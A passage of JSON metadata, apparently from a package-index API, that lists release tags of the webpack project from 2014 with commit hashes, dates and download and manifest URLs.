webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_p